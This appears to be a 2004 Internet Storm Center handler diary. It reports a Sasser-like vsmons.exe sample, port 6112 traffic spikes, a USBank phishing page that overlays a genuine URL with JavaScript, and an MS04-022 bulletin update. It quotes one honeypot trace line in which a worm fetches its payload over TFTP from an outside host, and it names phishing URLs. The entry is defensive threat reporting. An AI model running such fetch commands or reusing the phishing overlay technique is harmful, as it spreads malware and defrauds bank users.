Vsmons.exe / Port 6112 / USBank phishing / MS04-22 Update
Vsmons.exe
We received a report about traffic on port 445 and an application called vsmons.exe (not the Zone Alarm vsmon.exe).
If you have a sample of this application, please send it to us, and our malware group will take a look at it.
UPDATE: This looks like Sasser. The following honeypot trace shows a similar file:
tftp -i xxx.xxx.91.114 get vsmons.exe
vsmons.exe
Reference: http://wilderssecurity.com/showthread.php?t=41732
Traffic Spikes
Another report of strange traffic concerns port 6112 TCP. A user noticed a spike on this port and wonders whether it may be the result of the recent CDE vulnerability. According to ISC data, there were some spikes over the last 40 days, but the sources remain stable.
Reference: http://isc.sans.org/port_details.php?port=6112
USBank phishing
We received a USBank phishing report. This one is interesting because it uses JavaScript to create a window showing a valid USBank URL on top of the fake URL.
This is interesting but not new. A post to Bugtraq on May 13 shows a very similar phish. The difference here is the fake URL, which in this example is http://www.usbnk-update.info/secure and in the previous one was http://validation-required.info .
Again, this only works on IE.
Reference: http://www.securityfocus.com/archive/1/363326
MS04-22 Update
Microsoft just updated the MS04-22 security bulletin. It now lists more workarounds, which may help people who had problems with the patch.
Reference: http://www.microsoft.com/technet/security/bulletin/MS04-022.mspx
-------------------------------------------------------------
Handler on Duty: Pedro Bueno (bueno_AT_ieee.org)